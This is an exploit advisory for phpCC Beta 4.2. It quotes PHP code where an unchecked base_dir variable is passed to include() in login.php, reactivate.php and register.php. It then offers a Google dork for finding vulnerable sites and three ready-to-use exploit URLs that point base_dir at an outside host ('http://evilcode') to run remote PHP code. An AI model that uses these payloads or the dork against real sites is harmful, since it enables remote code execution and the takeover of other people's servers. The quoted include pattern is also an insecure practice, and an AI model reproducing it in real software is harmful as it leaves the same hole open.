#############################SolpotCrew Community################################
#################################################################################
################################################################################
###############################################################################
Input passed to the "base_dir" is not properly verified
before being used to include files. This can be exploited to execute
arbitrary PHP code by including files from local or external resources.
code from login.php
<?php
define('PHPCC', true);
define('SITE', 'login.php');
include($base_dir."includes/common.php");
include($base_dir."includes/header.php");
switch( $_GET['action'] )
code from reactivate.php
define('PHPCC', true);
include($base_dir."includes/config.php");
include($base_dir."includes/constants.php");
include($base_dir."includes/functions.php");
include($base_dir.'includes/sessions.php');
if( $_POST['submit'] == true )
code from register.php
<?php
define('PHPCC', true);
define('SITE', 'register.php');
include( $base_dir . "includes/common.php" );
include( $base_dir . "includes/header.php" );
Google dork : "Powered by phpCC Beta 4.2"
exploit : http://somehost/login.php?base_dir=http://evilcode
http://somehost/reactivate.php?base_dir=http://evilcode
http://somehost/register.php?base_dir=http://evilcode
##############################MY LOVE JUST FOR U RIE#########################
######################################E.O.F##################################